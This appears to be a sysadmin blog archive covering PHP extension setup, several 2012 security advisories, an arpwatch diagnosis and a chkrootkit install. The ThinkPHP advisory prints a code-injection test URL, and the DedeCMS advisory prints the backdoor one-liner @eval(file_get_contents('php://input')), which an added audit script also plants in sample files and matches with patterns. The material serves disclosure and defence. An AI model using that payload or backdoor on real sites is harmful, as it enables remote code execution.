

Installing the Ming library that Discuz needs for its Flash captcha

Recently someone has been cycling through IP addresses to brute-force Discuz passwords. Turning on the captcha mechanism cuts their success rate.

To give PHP Flash (SWF) support, the Ming library has to be installed:
http://www.libming.org/
The current latest version is ming-0.4.4

1. Install Ming

wget http://cdnetworks-kr-1.dl.sourceforge.net/project/ming/Releases/ming-0.4.4.tar.gz
tar zxvf ming-0.4.4.tar.gz
cd ming-0.4.4
./configure
make
make install

2. Install the PHP extension
Go into the PHP source tree.
/opt/php is a symlink to /opt/php-5.2.17p1


cd /home/c1g/src/php-5.2.17/ext/ming
/opt/php/bin/phpize
Configuring for:
PHP Api Version: 20041225
Zend Module Api No: 20060613
Zend Extension Api No: 220060519

./configure --with-php-config=/opt/php/bin/php-config
make
make install

Check that ming.so was generated:
ll /opt/php-5.2.17p1/lib/php/extensions/no-debug-non-zts-20060613/
-rwxr-xr-x 1 root root 367094 Apr 13 13:14 ming.so

3. Configure php.ini
Set the extension directory and the library to load in php.ini:
vi /opt/php/etc/php.ini

extension_dir = "/opt/php-5.2.17p1/lib/php/extensions/no-debug-non-zts-20060613/"
extension = "ming.so"

Restart PHP:
/opt/php/sbin/php-fpm reload

phpinfo now shows:

Ming SWF output library enabled
Version 0.4.4

Or check from the command line:
/opt/php/bin/php -m

[PHP Modules]
bcmath
ctype
curl
date
dom
eAccelerator
filter
gd
hash
iconv
imagick
json
libxml
mbstring
mcrypt
memcache
mhash
ming
mysql
mysqli
openssl
pcntl
pcre
PDO
pdo_sqlite
posix
Reflection
session
shmop
SimpleXML
soap
sockets
SPL
SQLite
standard
sysvsem
tokenizer
xml
xmlreader
xmlrpc
xmlwriter
Zend Optimizer
zip
zlib

[Zend Modules]
Zend Optimizer
eAccelerator

4. Discuz settings
Discuz admin panel -> Global -> Anti-flood settings: enable the Flash captcha.
Users -> User groups -> Guests and the relevant user groups: enable the anti-flood captcha or the question-and-answer verification.
Note: the user-group permissions must be set, otherwise the captcha is never shown.

Reference: installing an extension with phpize without recompiling PHP

Posted in Discuz/Uchome/Ucenter, PHP.



ThinkPHP web framework arbitrary PHP code execution vulnerability

Affected versions:
ThinkPHP
Description:
ThinkPHP is a long-established PHP MVC framework widely used in China; quite a few startups and projects are built on it.

ThinkPHP does not properly filter user-supplied parameters; a remote attacker can exploit this to execute arbitrary PHP code in the context of the application.

Test method:

The programs (methods) provided on this site may be offensive in nature and are for security research and teaching only; use at your own risk!
index.php/module/action/param1/${@print(THINK_VERSION)}
Remediation:
Users can download the official patch:
http://code.google.com/p/thinkphp/source/detail?spec=svn2904&r=2838
or modify the source directly:
/trunk/ThinkPHP/Lib/Core/Dispatcher.class.php
$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));
change to
$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']=\'\\2\';', implode($depr,$paths));
Change the double quotes in the second preg_replace argument to single quotes, so that PHP variable syntax inside the captured value is not parsed and executed by the /e modifier.

From sebug.net

Posted in 安全通告, 技术.



Two unspecified local vulnerabilities in Oracle MySQL Server

Published: 2012-04-09
Affected versions:
Oracle MySQL 5.x
Description:
MySQL is a small relational database management system developed by the Swedish company MySQL AB, which was acquired by Sun on 16 January 2008.

Oracle MySQL has two security vulnerabilities in its implementation that can be exploited locally to some effect.
<* Reference: http://dev.mysql.com/doc/refman/5.5/en/news-5-5-22.html *>
Remediation:
Vendor patch:

Oracle
------
The vendor has released an upgrade patch fixing this security issue; download it from the vendor's homepage:

http://www.oracle.com/technetwork/topics/security/

Posted in Mysql, 安全通告.


ImageMagick denial-of-service vulnerability

Published: 2012-04-09
Updated: 2012-04-09
Severity: Medium
Vulnerability type:
Threat type: Remote
CVE: CVE-2012-0259

ImageMagick is an open-source image viewing and editing tool for Unix/Linux platforms.
ImageMagick has a denial-of-service vulnerability caused by an error in the "GetEXIFProperty()" function (magick/property.c) when parsing a JPEG EXIF tag whose component count is 0. An attacker can use a specially crafted JPEG image to trigger access to uninitialized or invalid memory.

The vendor has released an upgrade patch fixing this security issue; patch links:
http://www.imagemagick.org/discourse-server/viewtopic.php?f=4&t=20629
http://www.cert.fi/en/reports/2012/vulnerability635606.html

Source: www.imagemagick.org
Link: http://www.imagemagick.org/discourse-server/viewtopic.php?f=4&t=20629

Source: www.cert.fi
Link: http://www.cert.fi/en/reports/2012/vulnerability635606.html

Source: seclists.org
Link: http://seclists.org/oss-sec/2012/q2/19

Source: SECUNIA
Name: 48679
Link: http://secunia.com/advisories/48679

Posted in Imagemagick, 安全通告.



libpng 'png_set_text_2()' memory corruption vulnerability

Published: 2012-04-01
Updated: 2012-04-01
Severity: High
Vulnerability type:
Threat type: Remote
CVE: CVE-2011-3048

libpng is a library used by many applications to parse the PNG image format.
Libpng has a vulnerability caused by an error in the "png_set_text_2()" function when parsing certain text chunks. An attacker can use a specially crafted PNG file to corrupt stack memory; successful exploitation may lead to arbitrary code execution. The vulnerability exists in libpng versions before 1.5.10, version 1.4.11, version 1.2.49 and version 1.0.59.

The vendor has released an upgrade patch fixing this security issue; patch link:
http://www.libpng.org/pub/png/src/libpng-1.5.10-README.txt

Source: www.libpng.org
Link: http://www.libpng.org/pub/png/src/libpng-1.5.10-README.txt

Source: SECUNIA
Name: 48587
Link: http://secunia.com/advisories/48587

Posted in 安全通告.



phpMyAdmin sensitive information disclosure vulnerability

phpMyAdmin is a free web-based MySQL database administration tool.
A vulnerability exists in show_config_errors.php in phpMyAdmin 3.4.x versions before 3.4.10.2. When the configuration file does not exist, a remote attacker can obtain sensitive information via a direct request (the error message leaks the installation path of the missing file).

Lempelf is running phpMyAdmin 3.4.10.1; note that it needs upgrading.

The vendor has released an upgrade patch fixing this security issue; patch link:
http://www.mandriva.com/en/downloads/

Source: github.com
Link: https://github.com/phpmyadmin/phpmyadmin/commit/c51817d3b8cb05ff54dca9373c0667e29b8498d4

Source: www.phpmyadmin.net
Link: http://www.phpmyadmin.net/home_page/security/PMASA-2012-2.php

Posted in 安全通告.



DedeCMS backdoor remote code execution vulnerability

DedeCMS (织梦 content management system) is a PHP+MySQL based website content management system developed in China that supports multiple server platforms.

In certain versions of DedeCMS, backdoor code was added to the file /include/shopcar.class.php; a remote, unauthenticated attacker can use this backdoor to execute arbitrary commands.
DedeCMS V5.7 SP1 release

The UTF-8 and GBK builds are suspected of having been implanted with a one-line backdoor.
shopcar.class.php was implanted with the one-liner @eval(file_get_contents('php://input'));

Temporary workaround:

If you cannot install the patch or upgrade immediately, NSFOCUS recommends the following measures to reduce the threat:

* Locate the shopcar.class.php file under the site's include directory and remove the code
@eval(file_get_contents('php://input')); from it.

http://www.wooyun.org/bugs/wooyun-2010-05416
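The code-level findings in this advisory and in the ThinkPHP one above share a single audit: search the PHP tree for preg_replace() calls whose pattern carries the /e modifier, and for eval()/assert() calls fed from request input. The script below is an added example, not code from either advisory or from the ThinkPHP or DedeCMS projects; the sample files it writes to a temporary directory are constructed stand-ins for the two snippets quoted on this page, and the function names are my own.

```shell
#!/bin/sh
# Added example (not code from the original advisories or projects): audit a
# PHP tree for two patterns discussed above. scan_preg_e() finds preg_replace()
# calls whose pattern string ends in an /e modifier (the construct behind the
# ThinkPHP Dispatcher bug); scan_eval_input() finds eval()/assert() calls fed
# from request data, like the shopcar.class.php one-liner. Function names and
# the sample files are my own; point the scanners at a real web root in use.

# preg_replace( <first argument, no commas> <delimiter><flags containing e>' ,
# Only literal pattern strings are caught; a pattern held in a variable is not.
scan_preg_e() {
    find "$1" -name '*.php' -exec grep -HnE \
        "preg_replace[[:space:]]*\([^,]*[^a-zA-Z0-9[:space:]][a-zA-Z]*e[a-zA-Z]*['\"][[:space:]]*," {} + | sort
}

# eval( or assert( on a line that also references request input
scan_eval_input() {
    find "$1" -name '*.php' -exec grep -HnE \
        '(eval|assert)[[:space:]]*\(.*(\$_(POST|GET|REQUEST|COOKIE)|php://input)' {} + | sort
}

# Build a scratch tree of constructed sample files and print its path.
make_sample_tree() {
    dir=$(mktemp -d)
    mkdir -p "$dir/Lib/Core" "$dir/include"
    # constructed stand-in for the vulnerable Dispatcher line (/e modifier)
    cat > "$dir/Lib/Core/Dispatcher.class.php" <<'EOF'
<?php
$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));
EOF
    # constructed stand-in for the shopcar.class.php backdoor line
    cat > "$dir/include/shopcar.class.php" <<'EOF'
<?php
class ShopCar {}
@eval(file_get_contents('php://input'));
EOF
    # clean file: callback instead of /e, no eval
    cat > "$dir/include/clean.php" <<'EOF'
<?php
$res = preg_replace_callback('/(\w+)/', function ($m) { return strtoupper($m[1]); }, $s);
EOF
    echo "$dir"
}

# Run both scans; print the findings and return 1 when anything was found.
audit_php_tree() {
    findings=$( { scan_preg_e "$1"; scan_eval_input "$1"; } )
    if [ -n "$findings" ]; then
        printf '%s\n' "$findings"
        return 1
    fi
    echo "no /e patterns or eval-of-input found under $1"
    return 0
}

sample=$(make_sample_tree)
audit_php_tree "$sample" || echo "audit returned non-zero: findings present"
rm -rf "$sample"
```

Run against a real tree with `audit_php_tree /path/to/webroot`; a non-zero exit makes it usable from cron in the same way as the chkrootkit script later on this page. The /e scan only catches literal pattern strings, so a pattern assembled in a variable still needs a manual look.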

Posted in 安全通告.



Microsoft Windows Remote Desktop Protocol (port 3389) code execution vulnerability

Microsoft Windows is Microsoft's very popular operating system.
The Remote Desktop Protocol (RDP) implementation in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2 and R2 SP1, and Windows 7 Gold and SP1 has a vulnerability caused by improper handling of packets in memory. A remote attacker can send specially crafted RDP packets to trigger access to an object that is (1) not properly initialized or (2) already deleted, and execute arbitrary code. Also known as the 'Remote Desktop Protocol Vulnerability'.
A fix is available. If the patch cannot be installed promptly, the following temporary mitigations can be applied:
Method 1: disable Terminal Services, Remote Desktop, Remote Assistance and the Windows Small Business Server 2003 Remote Web Workplace feature;
Method 2: block TCP port 3389 at the enterprise perimeter firewall;
Method 3: enable Network Level Authentication on supported editions of Windows Vista, Windows 7, Windows Server 2008 and Windows Server 2008 R2.

The vendor has released an upgrade patch fixing this security issue; patch link:
http://technet.microsoft.com/zh-cn/security/bulletin/ms12-020

Source: MS
Name: MS12-020
Link: http://technet.microsoft.com/security/bulletin/MS12-020

Source: SECUNIA
Name: 48353
Link: http://secunia.com/advisories/48353

Posted in 安全通告.


ARP trouble caused by the DELL R410 remote management IP

The arpwatch command tracks Ethernet (MAC) address to IP address pairings and reports changes by e-mail. arpwatch uses pcap to listen for ARP packets on the local interface.
Options

-d            print debugging output
-N            disable reporting
-f <file>     the ARP record (database) file to use
-i <iface>    the network interface to listen on
-n            specify an additional local network
-r <file>     do not listen on the network; read ARP records from the file instead
-u            the user and group to run as
-e            send mail to the given user instead of the default root
-s            use the given user name as the return address instead of the default root

[Report messages]

ethernet broadcast: the host's MAC address is the broadcast address
ip broadcast: the host's IP address is the broadcast address
bogon: the source IP address is not on the local subnet
ethernet mismatch: the source MAC address does not match the address inside the ARP packet
reused old ethernet address: the MAC address has changed
suppressed DECnet flip flop: a "flip flop" report was suppressed

The local LAN is 192.168.0.0/24
Server: Dell R410
OS: CentOS 5.x / CentOS 6.x

Start arpwatch:
#arpwatch

#tail -f /var/log/messages

Apr 1 11:58:06 c1g arpwatch: bogon 192.168.0.120 0:62:b9:5c:a4:41
Apr 1 11:58:11 c1g arpwatch: bogon 192.168.0.120 98:2b:cb:3d:37:62
Apr 1 11:58:23 c1g arpwatch: bogon 192.168.0.283 83:22:d6:a1:ad:31
Apr 1 11:58:29 c1g arpwatch: new station 220.188.155.1 0:23:e2:e1:ff:82
Apr 1 11:58:29 c1g arpwatch: bogon 192.168.0.120 98:2b:cb:49:bc:79
Apr 1 11:58:31 c1g arpwatch: bogon 192.168.0.120 c4:ca:d9:b6:4f:8
Apr 1 11:58:33 c1g arpwatch: bogon 192.168.0.120 98:2b:cb:3:ef:30
Apr 1 11:58:37 c1g arpwatch: bogon 192.168.0.120 0:62:b9:5c:a4:41
Apr 1 11:58:41 c1g arpwatch: bogon 192.168.0.120 98:2b:cb:3d:37:62
Apr 1 11:58:59 c1g arpwatch: bogon 192.168.0.120 98:2b:cb:49:bc:79
Apr 1 11:59:04 c1g arpwatch: bogon 192.168.0.120 98:2b:cb:3:ef:30
Apr 1 11:59:07 c1g arpwatch: bogon 192.168.0.120 0:62:b9:5c:a4:41
Apr 1 11:59:11 c1g arpwatch: bogon 192.168.0.120 98:2b:cb:3d:37:62

bogon means the source IP address is not on the local subnet.
The logs on several machines show multiple MAC addresses claiming 192.168.0.120.
I never configured the IP 192.168.0.120.
Oddly, the MACs are always the same fixed few, which does not look like an ARP attack.

Apr 1 11:58:31 c1g arpwatch: bogon 192.168.0.120 c4:ca:d9:b6:4f:8
Apr 1 11:58:59 c1g arpwatch: bogon 192.168.0.120 98:2b:cb:49:bc:79
Apr 1 11:59:04 c1g arpwatch: bogon 192.168.0.120 98:2b:cb:3:ef:30
Apr 1 11:59:07 c1g arpwatch: bogon 192.168.0.120 0:62:b9:5c:a4:41
Apr 1 11:59:11 c1g arpwatch: bogon 192.168.0.120 98:2b:cb:3d:37:62

Comparing carefully, the MAC addresses in the log differ from the MAC of the eth1 in use by one digit;
I recalled that one of the R410s on hand seemed to show the IP 192.168.0.120 during boot;
Looking it up, Dell's remote management IP defaults to 192.168.0.120;
I tested it right away: after booting as far as the SAS stage, press Ctrl+C to enter the IP management menu and set this item to disabled.
After the next boot that MAC address was gone, which proves it works.
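To spot this situation without reading the log by eye, the following added example (not part of the original post) summarises arpwatch lines from syslog and lists every IP that more than one MAC address has claimed. The embedded sample lines are the ones shown above; the function names and the DELL_MGMT_DEFAULT_IP constant, taken from the post's finding, are my own.

```shell
#!/bin/sh
# Added example, not from the original post: summarise arpwatch log lines and
# list every IP address that more than one MAC has claimed. The sample lines
# are the ones shown in the post, embedded so the script runs offline; in
# practice feed it /var/log/messages instead. Function names are my own.

# The post's finding: Dell's remote management address defaults to this.
DELL_MGMT_DEFAULT_IP=192.168.0.120

SAMPLE_LOG='Apr 1 11:58:06 c1g arpwatch: bogon 192.168.0.120 0:62:b9:5c:a4:41
Apr 1 11:58:11 c1g arpwatch: bogon 192.168.0.120 98:2b:cb:3d:37:62
Apr 1 11:58:23 c1g arpwatch: bogon 192.168.0.283 83:22:d6:a1:ad:31
Apr 1 11:58:29 c1g arpwatch: new station 220.188.155.1 0:23:e2:e1:ff:82
Apr 1 11:58:29 c1g arpwatch: bogon 192.168.0.120 98:2b:cb:49:bc:79
Apr 1 11:58:31 c1g arpwatch: bogon 192.168.0.120 c4:ca:d9:b6:4f:8
Apr 1 11:58:33 c1g arpwatch: bogon 192.168.0.120 98:2b:cb:3:ef:30
Apr 1 11:58:37 c1g arpwatch: bogon 192.168.0.120 0:62:b9:5c:a4:41
Apr 1 11:58:41 c1g arpwatch: bogon 192.168.0.120 98:2b:cb:3d:37:62
Apr 1 11:58:59 c1g arpwatch: bogon 192.168.0.120 98:2b:cb:49:bc:79
Apr 1 11:59:04 c1g arpwatch: bogon 192.168.0.120 98:2b:cb:3:ef:30
Apr 1 11:59:07 c1g arpwatch: bogon 192.168.0.120 0:62:b9:5c:a4:41
Apr 1 11:59:11 c1g arpwatch: bogon 192.168.0.120 98:2b:cb:3d:37:62'

# Read arpwatch lines from the files given (or stdin) and print, for each IP
# seen with more than one MAC: "<ip> <distinct MAC count> <macs...>".
# The IP is the first dotted-quad field after "arpwatch:", the MAC the field
# after it, which covers bogon, new station and changed ethernet address lines.
ips_with_multiple_macs() {
    awk '
        /arpwatch:/ {
            ip = ""
            for (i = 6; i <= NF; i++)
                if ($i ~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/) { ip = $i; mac = $(i + 1); break }
            if (ip == "") next
            if (!((ip, mac) in seen)) {
                seen[ip, mac] = 1
                count[ip]++
                macs[ip] = macs[ip] " " mac
            }
        }
        END {
            for (ip in count)
                if (count[ip] > 1) print ip, count[ip] macs[ip]
        }
    ' "$@" | sort
}

# Number of distinct MACs seen for one IP (0 when it was not in conflict).
# Usage: mac_count_for <ip> < logfile
mac_count_for() {
    ips_with_multiple_macs | awk -v ip="$1" 'BEGIN { n = 0 } $1 == ip { n = $2 } END { print n }'
}

printf '%s\n' "$SAMPLE_LOG" | ips_with_multiple_macs | while read -r ip n macs; do
    echo "$ip claimed by $n MACs: $macs"
    if [ "$ip" = "$DELL_MGMT_DEFAULT_IP" ]; then
        echo "  -> matches the Dell remote management default IP; check the R410 BMC settings"
    fi
done
```

On the post's sample this prints one conflict, 192.168.0.120 with five MACs, and flags it as the Dell default; on a live box run `ips_with_multiple_macs /var/log/messages` instead of the embedded sample.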

Posted in IDC, Linux 命令, 安全.



Installing the intrusion detection tool chkrootkit

Rootkits are tools intruders use constantly: they quietly, without the user noticing, set up a way to get back into the system at any time or to control it in real time. chkrootkit is a tool that checks whether a rootkit has been installed on a system. It cannot catch 100% of them, of course, so install it right after the system is set up, or rather before the server goes live.
Official site: http://www.chkrootkit.org
The current latest version is chkrootkit-0.49
The official download may not work; you can use the copy on my blog instead: http://blog.c1gstudio.com/lempelf/chkrootkit-0.49.tar.gz
Test system: CentOS 5.8

1. Installation

wget http://blog.c1gstudio.com/lempelf/chkrootkit-0.49.tar.gz
tar zxvf chkrootkit-0.49.tar.gz
cd chkrootkit*
make sense
cd ..
mv -f chkrootkit-* /usr/local/chkrootkit
chown -R root:root /usr/local/chkrootkit
chmod -R 700 /usr/local/chkrootkit

2. Running

Some of the checks work relative to the current directory, so cd into the chkrootkit directory first
cd /usr/local/chkrootkit
./chkrootkit

ROOTDIR is `/'
Checking `amd'... not found
Checking `basename'... not infected
Checking `biff'... not found
Checking `chfn'... not infected
Checking `chsh'... not infected
Checking `cron'... not infected
Checking `crontab'... not infected
Checking `date'... not infected
Checking `du'... not infected
Checking `dirname'... not infected
Checking `echo'... not infected
Checking `egrep'... not infected
Checking `env'... not infected
Checking `find'... not infected
Checking `fingerd'... not found
Checking `gpm'... not infected
Checking `grep'... not infected
Checking `hdparm'... not infected
Checking `su'... not infected
Checking `ifconfig'... not infected
Checking `inetd'... not tested
Checking `inetdconf'... not found
Checking `identd'... not found
Checking `init'... not infected
Checking `killall'... not infected
Checking `ldsopreload'... not infected
Checking `login'... not infected
Checking `ls'... not infected
Checking `lsof'... not infected
Checking `mail'... not infected
Checking `mingetty'... not infected
Checking `netstat'... not infected
Checking `named'... not found
Checking `passwd'... not infected
Checking `pidof'... not infected
Checking `pop2'... not found
Checking `pop3'... not found
Checking `ps'... not infected
Checking `pstree'... not infected
Checking `rpcinfo'... not infected
Checking `rlogind'... not found
Checking `rshd'... not found
Checking `slogin'... not infected
Checking `sendmail'... not infected
Checking `sshd'... not infected
Checking `syslogd'... not infected
Checking `tar'... not infected
Checking `tcpd'... not infected
Checking `tcpdump'... not infected
Checking `top'... not infected
Checking `telnetd'... not infected
Checking `timed'... not found
Checking `traceroute'... not infected
Checking `vdir'... not infected
Checking `w'... not infected
Checking `write'... not infected
Checking `aliens'... no suspect files
Searching for sniffer's logs, it may take a while... nothing found
Searching for HiDrootkit's default dir... nothing found
Searching for t0rn's default files and dirs... nothing found
Searching for t0rn's v8 defaults... nothing found
Searching for Lion Worm default files and dirs... nothing found
Searching for RSHA's default files and dir... nothing found
Searching for RH-Sharpe's default files... nothing found
Searching for Ambient's rootkit (ark) default files and dirs... nothing found
Searching for suspicious files and dirs, it may take a while...
/usr/lib/python2.4/config/.relocation-tag /usr/lib/gtk-2.0/immodules/.relocation-tag /usr/lib/.libgcrypt.so.11.hmac /lib/.libssl.so.0.9.8e.hmac /lib/.libcrypto.so.0.9.8e.hmac /lib/.libssl.so.6.hmac /lib/.libcrypto.so.6.hmac

Searching for LPD Worm files and dirs… nothing found
Searching for Ramen Worm files and dirs… nothing found
Searching for Maniac files and dirs… nothing found
Searching for RK17 files and dirs… nothing found
Searching for Ducoci rootkit… nothing found
Searching for Adore Worm… nothing found
Searching for ShitC Worm… nothing found
Searching for Omega Worm… nothing found
Searching for Sadmind/IIS Worm… nothing found
Searching for MonKit… nothing found
Searching for Showtee… nothing found
Searching for OpticKit… nothing found
Searching for T.R.K… nothing found
Searching for Mithra… nothing found
Searching for LOC rootkit… nothing found
Searching for Romanian rootkit… nothing found
Searching for HKRK rootkit… nothing found
Searching for Suckit rootkit… nothing found
Searching for Volc rootkit… nothing found
Searching for Gold2 rootkit… nothing found
Searching for TC2 Worm default files and dirs… nothing found
Searching for Anonoying rootkit default files and dirs… nothing found
Searching for ZK rootkit default files and dirs… nothing found
Searching for ShKit rootkit default files and dirs… nothing found
Searching for AjaKit rootkit default files and dirs… nothing found
Searching for zaRwT rootkit default files and dirs… nothing found
Searching for Madalin rootkit default files… nothing found
Searching for Fu rootkit default files… nothing found
Searching for ESRK rootkit default files… nothing found
Searching for rootedoor… nothing found
Searching for ENYELKM rootkit default files… nothing found
Searching for common ssh-scanners default files… nothing found
Searching for suspect PHP files…
/tmp/pear/download/Archive_Tar-1.3.9/Archive/Tar.php
/tmp/pear/download/XML_Util-1.2.1/tests/AllTests.php
/tmp/pear/download/XML_Util-1.2.1/Util.php
/tmp/pear/download/XML_Util-1.2.1/examples/example2.php
/tmp/pear/download/XML_Util-1.2.1/examples/example.php
/tmp/pear/download/Archive_Tar-1.3.7/Archive/Tar.php
/tmp/pear/download/Structures_Graph-1.0.4/tests/testCase/BasicGraph.php
/tmp/pear/download/Structures_Graph-1.0.4/tests/AllTests.php
/tmp/pear/download/Structures_Graph-1.0.4/Structures/Graph.php
/tmp/pear/download/Structures_Graph-1.0.4/Structures/Graph/Node.php
/tmp/pear/download/Structures_Graph-1.0.4/Structures/Graph/Manipulator/AcyclicTest.php
/tmp/pear/download/Structures_Graph-1.0.4/Structures/Graph/Manipulator/TopologicalSorter.php
/tmp/pear/download/PEAR-1.9.1/PEAR5.php
/tmp/pear/download/PEAR-1.9.1/PEAR/REST/10.php
/tmp/pear/download/PEAR-1.9.1/PEAR/REST/13.php
/tmp/pear/download/PEAR-1.9.1/PEAR/REST/11.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Builder.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Downloader/Package.php
/tmp/pear/download/PEAR-1.9.1/PEAR/FixPHP5PEARWarnings.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Installer/Role/Data.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Installer/Role/Doc.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Installer/Role/Php.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Installer/Role/Cfg.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Installer/Role/Src.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Installer/Role/Www.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Installer/Role/Test.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Installer/Role/Common.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Installer/Role/Script.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Installer/Role/Ext.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Installer/Role.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Packager.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Validator/PECL.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Installer.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Config.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Registry.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Command/Install.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Command/Mirror.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Command/Remote.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Command/Build.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Command/Config.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Command/Registry.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Command/Pickle.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Command/Channels.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Command/Auth.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Command/Test.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Command/Common.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Command/Package.php
/tmp/pear/download/PEAR-1.9.1/PEAR/PackageFile.php
/tmp/pear/download/PEAR-1.9.1/PEAR/RunTest.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Autoloader.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Frontend.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Validate.php
/tmp/pear/download/PEAR-1.9.1/PEAR/ErrorStack.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Task/Replace/rw.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Task/Unixeol/rw.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Task/Postinstallscript.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Task/Windowseol/rw.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Task/Replace.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Task/Unixeol.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Task/Windowseol.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Task/Common.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Task/Postinstallscript/rw.php
/tmp/pear/download/PEAR-1.9.1/PEAR/ChannelFile/Parser.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Common.php
/tmp/pear/download/PEAR-1.9.1/PEAR/XMLParser.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Downloader.php
/tmp/pear/download/PEAR-1.9.1/PEAR/DependencyDB.php
/tmp/pear/download/PEAR-1.9.1/PEAR/PackageFile/v2.php
/tmp/pear/download/PEAR-1.9.1/PEAR/PackageFile/v2/rw.php
/tmp/pear/download/PEAR-1.9.1/PEAR/PackageFile/v2/Validator.php
/tmp/pear/download/PEAR-1.9.1/PEAR/PackageFile/Generator/v2.php
/tmp/pear/download/PEAR-1.9.1/PEAR/PackageFile/Generator/v1.php
/tmp/pear/download/PEAR-1.9.1/PEAR/PackageFile/v1.php
/tmp/pear/download/PEAR-1.9.1/PEAR/PackageFile/Parser/v2.php
/tmp/pear/download/PEAR-1.9.1/PEAR/PackageFile/Parser/v1.php
/tmp/pear/download/PEAR-1.9.1/PEAR/REST.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Command.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Dependency2.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Exception.php
/tmp/pear/download/PEAR-1.9.1/PEAR/Frontend/CLI.php
/tmp/pear/download/PEAR-1.9.1/PEAR/ChannelFile.php
/tmp/pear/download/PEAR-1.9.1/scripts/peclcmd.php
/tmp/pear/download/PEAR-1.9.1/scripts/pearcmd.php
/tmp/pear/download/PEAR-1.9.1/System.php
/tmp/pear/download/PEAR-1.9.1/PEAR.php
/tmp/pear/download/PEAR-1.9.1/OS/Guess.php
/tmp/pear/download/Console_Getopt-1.2.3/Console/Getopt.php
/tmp/pear/download/PEAR-1.9.4/PEAR5.php
/tmp/pear/download/PEAR-1.9.4/PEAR/REST/10.php
/tmp/pear/download/PEAR-1.9.4/PEAR/REST/13.php
/tmp/pear/download/PEAR-1.9.4/PEAR/REST/11.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Builder.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Downloader/Package.php
/tmp/pear/download/PEAR-1.9.4/PEAR/FixPHP5PEARWarnings.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Installer/Role/Data.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Installer/Role/Doc.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Installer/Role/Php.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Installer/Role/Cfg.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Installer/Role/Src.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Installer/Role/Www.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Installer/Role/Test.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Installer/Role/Common.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Installer/Role/Script.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Installer/Role/Ext.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Installer/Role.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Packager.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Validator/PECL.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Installer.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Config.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Registry.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Command/Install.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Command/Mirror.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Command/Remote.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Command/Build.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Command/Config.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Command/Registry.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Command/Pickle.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Command/Channels.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Command/Auth.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Command/Test.php
/tmp/pear/download/PEAR-1.9.4/PEAR/Command/Common.php
